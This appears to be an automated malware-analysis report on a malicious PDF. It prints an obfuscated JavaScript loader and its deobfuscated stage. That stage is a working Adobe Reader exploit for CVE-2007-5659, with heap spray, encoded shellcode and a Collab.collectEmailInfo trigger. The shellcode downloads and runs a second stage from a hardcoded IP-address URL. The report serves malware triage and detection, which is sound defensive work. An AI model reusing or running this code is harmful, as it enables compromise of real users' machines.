MALICIOUS (Risk Score 308)

Malware Insights
MITRE ATT&CK: T1059.001 PowerShell; T1059.007 JavaScript
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is often employed to de-obfuscate and execute malicious code. The extracted JavaScript artifact, javascript_obj0013_001.js, also shows signs of script obfuscation. The primary attack pattern involves leveraging JavaScript within a PDF to execute arbitrary code, likely to download and run a secondary payload.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (8)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low; 3 related findings; PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
  function EXFNSLQfxNc3(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function X926brl(LxvZHpCOs1Lqqo){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(LxvZHpCOs1Lqqo)"+";"+"}");eval("function pUddPAHwHF(qZts9hY){var XwyqTNJD6RFmi="+"0,jnAXKmv=qZts9hY.l"+"en"+"gth,FN2GwVuZv5rrM=10"+"2"+"4,qegYWpF5eSs,WCbvt,jvhFQbpL='',PC3nrgTQDJg=XwyqTNJD6RFmi,g9Am9NO4GoNCWc=XwyqTNJD6RFmi,rRyn9A=XwyqTNJD6RFmi,d3WPSji93gHCSP=Ar" …
- PDF exploit shellcode contains an embedded download URL (high; PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high; PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (medium; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://91.203.92.136/spl2/load.php?id=282&spl=4 (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x36A | 6464 bytes |

SHA-256: a42ad667d28d7a191adedeb9293b5441510ce5d5eaa2669e58a44dcb7cf31b24
Detection (ClamAV): No threats found
Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). 196 of 243 identifiers look randomly generated (e.g. 'RVKRKVvPqvCPKVvPqVNTC3vPqTLVsvvPqTKVd3vP'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
function EXFNSLQfxNc3(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function X926brl(LxvZHpCOs1Lqqo){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(LxvZHpCOs1Lqqo)"+";"+"}");eval("function pUddPAHwHF(qZts9hY){var XwyqTNJD6RFmi="+"0,jnAXKmv=qZts9hY.l"+"en"+"gth,FN2GwVuZv5rrM=10"+"2"+"4,qegYWpF5eSs,WCbvt,jvhFQbpL='',PC3nrgTQDJg=XwyqTNJD6RFmi,g9Am9NO4GoNCWc=XwyqTNJD6RFmi,rRyn9A=XwyqTNJD6RFmi,d3WPSji93gHCSP=Ar"+"ra"+"y(63,31,40,13,8,43,55,2,34,18,0,0,0,0,0,0,7,49,14,3,59,19,28,29,9,10,56,51,52,27,6,42,1,46,0,37,17,45,12,23,39,22,47,0,0,0,0,4,0,44,25,53,36,58,24,30,41,54,57,11,33,5,32,61,21,48,26,20,60,38,16,15,62,50,35);f"+"o"+"r(WCbvt=M"+"at"+"h.c"+"ei"+"l(jnAXKmv/"+"FN2GwVuZv5rrM)"+";WCbvt>XwyqTNJD6RFmi;WCbvt-"+"-){fo"+"r(qegYWpF5eSs=Ma"+"th.m"+"in(jnAXKmv,FN2GwVuZv5rrM);qegYWpF5eSs>XwyqTNJD6RFmi;qegYWpF5eSs-"+"-,jnAXKmv-"+"-){rRyn9A|"+"=(d3WPSji93gHCSP[qZts9hY.cha"+"rCod"+"eAt(PC3nrgTQDJg+"+"+)-48])<"+"<g9Am9NO4GoNCWc;if(g9Am9NO4GoNCWc){jvhFQbpL+"+"=X926brl"+"(117^rRyn9A&"+"2"+"5"+"5);rRyn9A>"+">="+"8;g9Am9NO4GoNCWc-"+"="+"2;}el"+"se{g9Am9NO4GoNCWc="+"6"+";}}"+"}return (jvhFQbpL);}var 
CTqfq3CSfJud8=implode('',['p3Rm@spk','wv7','Resm','9','pU','P','_','7sm3','@','FRmV','Lm','WBpc_Ralm','PqlNM','sm','V1','VC','R','1f','PP8LlHGTz3Y_ykRhTYpPRNDn','zNlfyNPnK3jqpp','BsSR','GqTNvspWLf','zmlt7v','rapN','va','l_PL','AW@S_','RfaCB','r_8HM_','RB6dC','WBvz3Y','_ykR','hTpglspLf','zmlt7vrJ_7pTz3','Y_ykR','hTp4pm3ifT4ZRdNMbR','R','WfvR@q','AN9LpTbP','RNDnzNl','fyNPnK3','j2cTFjsp@RTR','RFq','NpTz','3Y_','y','kRhlEplvpERqNY_','R@raTpR','vANv_','C_LVv','EyqLwNf','TW','FpSCp3Rm@','sm','3XRv@','AqE','v@SA4mV','lP@pm','9','ppsCm','bTTYsdmmblE','p3Rm','@sp','@7F','Aks2TV','bJlw','@bvp4','pmRMRl','PYv','TPvLcpvPvv','NmdTvPvvNmdT','vPv','vNmd','TvPvTKRK3vPn','TNPL3vP','qvCbCE','vPvEmGCEvPvE','mp_','T','vPRVKfdTvPRV','@','m','dTvPRV6VC3vPRV3p','_v','vPqV','K','Rz','3vPqV','KVKVvPvE','64LVv','PvVK__VvPR','VKRK','VvPqvPPKVvPRVN','TKVvP','REKV','sv','vPvv@3zTvPREKVsvvPqvq','R','z','v','vPRV','KsdTv','P','RVKR','K3v','PqvPPK','VvPq3V','pdTvPqv_cdvvPRV','_TC','TvPvT7pdTvPRV','Kv_TvPRVKRKVvPR3L','VLvvPq3VP','K3vPnv','7cdvvPqv','R','T_TvPvT7','PCTvPRVKv','LVvPRVKRK','V','v','PR3LVL','vvPq3VP','zvvPn3LLdv','vPRTmPLVvPvT7GsVvPRVKssVvPRV','KRKVvP','R3L','VLvvPq3VPzTvPvTmcd','vvPvTKF_TvPvT7cLVvPRV','KfL3vPRVK','RKVvPR3L','VLvvPq','3V3KV','v','PqTqLdvvPvTLq','L','vvPvT7PdvvPRV','KF_Ev','PRVKR','KVvPR3LV','LvvPR3KVK3vPvV73LV','vPRELFd','3vP','qvCT_vvPqV7TC3vPRV3pL','vvPRVKRC','VvP','q','3_P','KVvP','RELVLvvP','qvP','bK3vPRV6vC','3vPRVqL_vvP','q','vP','GKvvPqV','7GC','3vPvT','7GCEvPRVK','Vsv','vP','RVKRKVv','PvE7GKVvPqV','RmCEvPR','EKf','ET','vPnv3pdvv','P','RVKRKVvPqvCPKVvPqVNTC3vPqTLVsvvPqTKVd3vPqvCGK','VvPn3Kv','C3vPRTmc','dvvPRV','KRKVv','P','q','3KRKVv','PR3LVsvvPvER','3K3vP','q','3CPEVv','Pq3L','Vsvv','PvT','7','3zv','vPR','VKL_Vv','PR','VKRKVvPR3L','Rz3vPqT3bKVv','Pq3NP','KV','vPn','3_A_T','vPq','T3c_3vPRV6v','KVv','PvE','Lqdv','vPR','VKR','KVvPRELvsTvPqvPbKV','vPRVNT','C3','v','PRV','qL','_vvPqvP','GKvvPqV7','GC3vPR','3Ksdv','vP','RVKRK','Vv','PvER','PKVvPq37PEEvPR3LRz3vP','vV
','if','K3vPq3ifsvvP','R','TmGz3v','Pn3Kq_3','vPq3iF','KVv','PR3','LVsvv','Pv','E','R3','zTvPq3CP','C3vP','q3','LVs','vvPvT73zvvPRVK','fz3vP','RVKRKV','vPRVKL_','v','vP','R','E','Lvs','Tv','PqvPb','KVvPRV7TC3vPRVAL_','v','v','Pqv','PGKvvPqV','7G','C3vPqVKsdv','vPR','VKRKVvPv','ERPKV','vPqvPTsTvPqVKvC3','v','PRVqL_vvP','qvP','GK','vvPqV7','GC3','vPRVKsdvvPRV','KRKVvP','R','3q','RKV','v','Pq3AFEvv','PvTqR','z','3vPvTqRz3','vP','v','T','qR','z3vP','vTqRz3vPvTN3d3vPq3RPK3vPqvPG','z3vPvT','Af_v','v','Pq3A','vsE','vP','vTKvsTvPqvPGC3','vPqvPpdT','vPRV','7ALTv','Pq3@3svvP','q3VPz','TvPREiVs','vvPqvPm','zTv','P','qV','_','AL','3vP','RV','iqdvvPq3V','T','d3vPREV3svvPRVifK','Vv','Pv','Vivd3v','PR3CGL','vvPvv@T','C','Vv','PqTiRz3vP','vVi','FCEvPRVmT_EvPqVKR_','TvPRTA_','CvvPR','V7AL','3vPqT_G_VvPRViR','KT','vPR3Kv','sVvPRTqss','vvPRT_mEvvP','RELFCTvPq3Rp_','3vPvTP3s','vvPq3R3svv','PR','Vi','f','K3vPvE','VbL','TvPRVN3svvP','qvP','TEvvPq','VNGCvvPn','T@Pz3vP','RV6','Vsv','vPR','V','iVsvvPq3_G_3vP','qTAFKTv','PRVKRzvvPRT','6','sdvvPRTmT_TvPq3LvsTvPR3','NGEVvPR3mTK','T','vPRVK','vCTvPnvP','3sEvPn','vmH','s','vvP','qTKf_3vPnTVGLV','vPq','T','qf_T','vP','nTmbLTv','Pq','T','qf','dTvPnT@b_','EvPnT_','G_VvPnTCbdTv','PnvNGLVvPqv','i4sTvPqT','KfLT','vPq','vK','Vd3vPqvP3_TvPnvmG_VvPn','vm3','sE','vP','qvVbLVv','PnTAVs','vv','P','nT3','bLTvPqTCbLTvPnvmHdTvP','nTAVd3vP','vTmbsvWA','SEp3Rm','@s','S','N','NTC','NVsm9ppsCPpsTmpsTBpcRsF','v','pjq7','m','Z','Jzw','R','dEp4pp@7FA','ks','2T','VbJlw@b','qY','bRAN9_v','@po','p','p@jspCvAPp','PRNDnzNlf','yN','PnK','3jsm','9phlTLnPCpl','ppGS','Cks','t8wxRvB','gp','sCNc','_','WBpc','R','sFvpLfzmlt7','vrsm9','pPqNvfnmssR_GGmsRqsTVp_sRqsT','VpLpFjspLfz','mlt','7','vrs','m9pPK@KRq','@Yvn4Gf','9WL','fzmlt','7v','rdpp','RnABJ2T','4uaTRJFE','BFj','spCvAPphKV1','4dv','9qy_','_qEp4ppW','LF7RG_CwPGs','Nz','sq','_NFspfpp','T3_sTmpsTm','AS','Y','rf_3fqnEp3lN@sp','W','C','vA','P','pA','K4UFnRuq73gfl3zqLT4','pd','EtV9','k@4n','Hav','z@Y','fK','4VGs9eV','K@7Hd_aVPPt
J_wzLyP','7f7kLJlmiV','7','E@jSWFpSCpcyCdRn','B','Q','qK4U','F','nRuq73gfl3','zqL','T2sm9','pT','z3Y_ykRh','T','pgp','p@7FAks2TVb','Jlw@bnEp','lv','p4sc_','R','al','mP','qlN','Ms','c4rs7vVLmWpjvpC','vAPpcT','T6VLRUsm9pT','TPmacRFRlR','v','Fq4vFnPF2ANMmnNu_qPFa','l_GASEpc','TT','6VLR','Us','m9','pcTT6VLRU','acPv','s','vNsfP_GhpIA2S_bGcpFj','spCv','APp','ol','vVFRT','0VLk','Z2Tp4pcNv4vpLF','qPsqvWGsL','3C3v','kM','bT@','sF','R3','PLpTFSp@mGKvCLy','YYLPm@v','ERGT_WbcT','T6VLRUaS','m','GvAPL_v','W@A','mW','Bpm@EspWGolvVFRT0V','LkZ','2lk','ml9','p4','lsp3pcs','E','ppWGolvVFRT0VLk','Z2lk_l9p4ls','p','_pcsE','pc@7A','qP_','o','Kv','Zt8NQ','F','_IpSsp@AppHdvp14_C@','v','LwCoykrJ7T2sp9pT','_','WFpp7HspW14_C@vLw','Coy','krJ9T2sm94pSvp3','c','spo','lvVFRT0VLkZ','2lk','_l9pHpmTFp','p7HspW1','4_','C','@vLwCoykrJ9T2s','p9pH_WF','p','SCp','PRmMRTVvvKR3','HCE0fnmG','ASEp3Rm@','scHnREBjL8','m','DdKTusm9','pPqNvfnmssR','_GGmsRsdmmbPsRs','dmmbApFjs','p7LP@bRTWXR7VjdEkY','aEB@','byYbRAN','9_v@','pSs','pPm','_ERG_WpG74qdEBUfABjFdHpjm','9pG74qdEBU','fABjFdHBpp','R','G','q','l','PMb','lNbdPmWf','9Rr','FR_plspi2TNbv','AmMb','lNbdP_Y_RVfv','P@bqKN','E2TWBf','RR','WtAEpGcpbllP9ts','p','XR7VjdEk','Ya','EB','@b77F','jsp4s','m7p38NSR','_CGASE']);");eval(pUddPAHwHF(CTqfq3CSfJud8));}

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36A | 2586 bytes |

SHA-256: c63739bd308f64f7e3e787886b17635447c05e220aec681c01342e8fb1c14531
Detection (ClamAV): No threats found
Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
var XzQuO = new Array(); function EjFujcqWhS(ACcTZ5o, umNMoTSntMBL) { while (ACcTZ5o.length*2<umNMoTSntMBL){ACcTZ5o += ACcTZ5o;} ACcTZ5o = ACcTZ5o.substring(0,umNMoTSntMBL/2); return ACcTZ5o; } function uaneDeAv8G9Jsc() { var ARuhDI42lVpfs2 = 0x0c0c0c0c; var hwbZaoDlkK2s = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u392F%u2E31%u3032%u2E33%u3239%u312E%u3633%u732F%u6C70%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3832%u2632%u7073%u3D6C%u0034"); var o3Amy = 0x400000; var LYaZKKuL = hwbZaoDlkK2s.length * 2; var umNMoTSntMBL = o3Amy - (LYaZKKuL+0x38); var ACcTZ5o = unescape("%u9090%u9090"); ACcTZ5o = EjFujcqWhS(ACcTZ5o, umNMoTSntMBL); var OFj77gYfqI = (ARuhDI42lVpfs2 - 0x400000)/o3Amy; for (var IVXrwSYAkcCV92=0;IVXrwSYAkcCV92<OFj77gYfqI;IVXrwSYAkcCV92++) { 
XzQuO[IVXrwSYAkcCV92] = ACcTZ5o + hwbZaoDlkK2s; } } function VoP5y() { var h0B6vX = app.viewerVersion.toString(); h0B6vX = h0B6vX.replace(/\D/g,""); var j7yr1J6ZZo = new Array(h0B6vX.charAt(0),h0B6vX.charAt(1),h0B6vX.charAt(2)); if ((j7yr1J6ZZo[0] == 8 && ((j7yr1J6ZZo[1] == 1 && j7yr1J6ZZo[2] < 2) || j7yr1J6ZZo[1] < 1)) || (j7yr1J6ZZo[0] == 7 && j7yr1J6ZZo[1] < 1) || (j7yr1J6ZZo[0] < 7)) { uaneDeAv8G9Jsc(); var RUELLXcNL2S = unescape("%u0c0c%u0c0c"); while(RUELLXcNL2S.length < 44952) RUELLXcNL2S += RUELLXcNL2S; this.collabStore = Collab.collectEmailInfo({subj: "",msg: RUELLXcNL2S}); } } VoP5y();